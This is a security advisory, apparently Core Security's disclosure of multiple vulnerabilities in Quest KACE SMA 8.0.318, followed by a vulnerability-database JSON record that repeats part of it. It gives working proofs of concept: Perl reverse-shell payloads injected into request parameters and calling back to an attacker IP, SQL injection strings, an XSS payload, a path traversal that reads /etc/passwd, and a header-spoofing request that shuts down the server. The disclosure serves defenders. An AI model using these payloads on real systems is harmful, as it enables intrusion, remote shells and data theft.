Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
- platform: Indicates the platform on which the agent is going to be installed - serv: SHA256 hash of a fixed value that depends on each appliance - orgid: Organization ID - version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute system commands, and the Organization ID is also used in a SQL query (see 7.7). This means we need a way to append shell commands to the Organization ID without breaking the SQL query. By using the SQL comment symbol (#), everything after it is ignored by the query but is still passed on to the command line, where ';' terminates the original command and starts ours.
Preparing payload:
/-----
- platform = windows
- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
- orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};';
- version = 8.0.152 (last agent version available for windows)
-----/
The following proof of concept executes a reverse shell:
/-----
GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
-----/
/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/-----
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/
7.3. Authenticated PHP object injection
[CVE-2018-11135] The '/adminui/error_details.php' script allows authenticated users to conduct PHP object injection attacks (deserialization of untrusted data). To exploit this issue, the 'ERROR_MESSAGES' parameter needs to be an array that meets some specific conditions; the advisory gives no further details on this finding.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager (the 'Sudo Server') that runs with root privileges and only allows a fixed set of commands.
One of the available commands allows changing any user's password (including root's).
Assuming we are able to run commands on the server (e.g. via 7.1 or 7.2), we could abuse this feature by changing the password of the 'kace_support' account, which is disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are meant to be accessible only from localhost. This restriction can be bypassed by supplying crafted 'Host' and 'X-Forwarded-For' HTTP headers (the proof of concept below sets them to 'localhost' and '::1'). Both headers are entirely under the client's control, so they must never be relied on for an access-control decision.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/-----
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. SQL injection in download_agent_installer.php
The 'orgid' parameter of the '/common/download_agent_installer.php' script (see 7.1) is vulnerable to SQL injection, in particular a blind, time-based one.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL injection in run_report.php
The 'reportId' parameter of the '/common/run_report.php' script is vulnerable to SQL injection, in particular an error-based one. The proof of concept below is sent with a session cookie.
The following proof of concept retrieves the current database name:
/-----
POST /common/run_report.php HTTP/1.1
Content-Length: 161
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/-----
HTTP/1.1 200 OK
Date: Thu, 08 Feb 2018 21:50:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: [ServerIP]
X-KACE-Version: 8.0.318
X-KBOX-WebServer: [ServerIP]
X-KBOX-Version: 8.0.318
X-KACE-WebServer: [ServerIP]
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Content-Length: 3548
Connection: close
Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross-Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script (the proof of concept is sent with an ordinary session cookie).
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords. Any credentials stored in those files should be treated as compromised, and rotated, on an appliance where this issue may have been exploited.
The following proof of concept demonstrates the vulnerability:
/-----
GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 18 Jan 2018 17:18:19 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: -1
Pragma: public
Content-Disposition: attachment; filename=""
Content-Transfer-Encoding: Binary
Content-Description: K1000 attachment
Content-Length: 2400
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: k10000.
X-KACE-Version: 8.0.318
X-KBOX-WebServer: k10000.
X-KBOX-Version: 8.0.318
X-KACE-WebServer: k10000.
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh
daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator::2:5:System &:/:/usr/sbin/nologin
bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
[...SNIPPED...]
-----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files, respectively. The following proof of concept creates a file at '/kbox/kboxwww/resources/TestWrite' whose content is supplied base64-encoded in the request ('VGVzdENvbnRlbnQ=', i.e. 'TestContent', 11 bytes, matching the directory listing below). Files can be written at any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. The existence of this file determines whether the appliance setup wizard is shown, so deleting it would make the appliance present its initial setup wizard again.
The following proof of concept demonstrates the vulnerability:
/-----
POST /adminui/advisory.php?ID=10 HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIP]/adminui/advisory.php?ID=10
Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100
Content-Length: 1705
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline
2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form.
2018-03-05: Quest Support confirmed the receipt and requested additional information.
2018-03-12: Core Security sent a draft advisory including a technical description.
2018-03-16: Quest Support asked for the CVE-IDs.
2018-03-16: Core Security answered saying that the CVE-IDs are requested once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery.
2018-03-16: Quest Support thanked Core for its reply and stated it would be in touch during the process.
2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one.
2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information.
2018-03-21: Core replied with the affected version (which was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories.
2018-03-21: Quest Support acknowledged the information provided.
2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and for the level of thoroughness and detail provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM stated that the work done by Core was in breach of its license agreement, and requested that Core not distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow-up email and informed that it had made a hotfix to patch the reported vulnerabilities. Quest also requested a call to understand future opportunities based on Core's capabilities. Finally, Quest asked for information about the researchers who found the vulnerabilities and a link of Core's choosing to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements).
2018-04-16: Core answered the email from 2018-03-26 stating that the company follows standard practices with regard to coordinated vulnerability disclosure, and also sent detailed technical information about its findings at Quest's request. Core also mentioned that Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that Quest encourages on its website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry-standard disclosure processes that involve publication of the vulnerabilities.
2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13).
2018-04-17: Core thanked Quest for the answer and stated its willingness to keep communications between the parties in writing in order to better document the process, and communicated the next steps of the process, including: 1. testing the fix (if the vendor agrees), 2. obtaining CVE-IDs, 3. obtaining a vendor link to be included in the advisory and finally 4. sending the final advisory version to the vendor and coordinating the publication date together.
With regard to Quest's requests, Core provided the researchers' names and the URL the advisory would have once published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest), but that its intention was to keep that services request separate from the coordinated disclosure process.
2018-04-18: Quest Support informed that they had publicly made patches available to their customers and unilaterally closed the case.
2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0595",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11135"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11135",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11135",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2018-15641",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11135",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11135",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-15641",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1219",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The script \u0027/adminui/error_details.php\u0027 in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks. Quest KACE Systems Management Appliance Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. The \\342\\200\\230/adminui/error_details.php\\342\\200\\231 script in QuestKACESystemManagementAppliance 8.0.318 has a PHP object injection vulnerability. An attacker can exploit this vulnerability to inject a PHP object and execute arbitrary commands. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. 